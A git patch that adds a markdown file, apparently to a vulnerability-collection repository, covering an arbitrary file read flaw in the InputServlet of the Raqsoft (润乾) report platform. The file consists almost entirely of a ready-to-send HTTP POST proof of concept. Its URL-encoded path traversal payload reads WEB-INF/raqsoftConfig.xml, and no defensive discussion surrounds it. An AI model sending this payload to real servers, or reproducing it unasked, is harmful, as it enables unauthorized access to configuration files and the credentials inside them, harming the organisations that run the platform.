From fa287f9eaf26b1b0b94534a801286445c7c5fc84 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 16 Apr 2024 16:48:16 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B6=A6=E4=B9=BE=E6=8A=A5=E8=A1=A8?= =?UTF-8?q?=E5=B9=B3=E5=8F=B0InputServlet=E5=AD=98=E5=9C=A8=E4=BB=BB?= =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 润乾报表平台InputServlet存在任意文件读取漏洞.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 润乾报表平台InputServlet存在任意文件读取漏洞.md diff --git a/润乾报表平台InputServlet存在任意文件读取漏洞.md b/润乾报表平台InputServlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..095482d --- /dev/null +++ b/润乾报表平台InputServlet存在任意文件读取漏洞.md @@ -0,0 +1,14 @@ +## 润乾报表平台InputServlet存在任意文件读取漏洞 + + +## poc +``` +POST /InputServlet?action=13 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Content-Type: application/x-www-form-urlencoded +Connection: close + +file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config + +```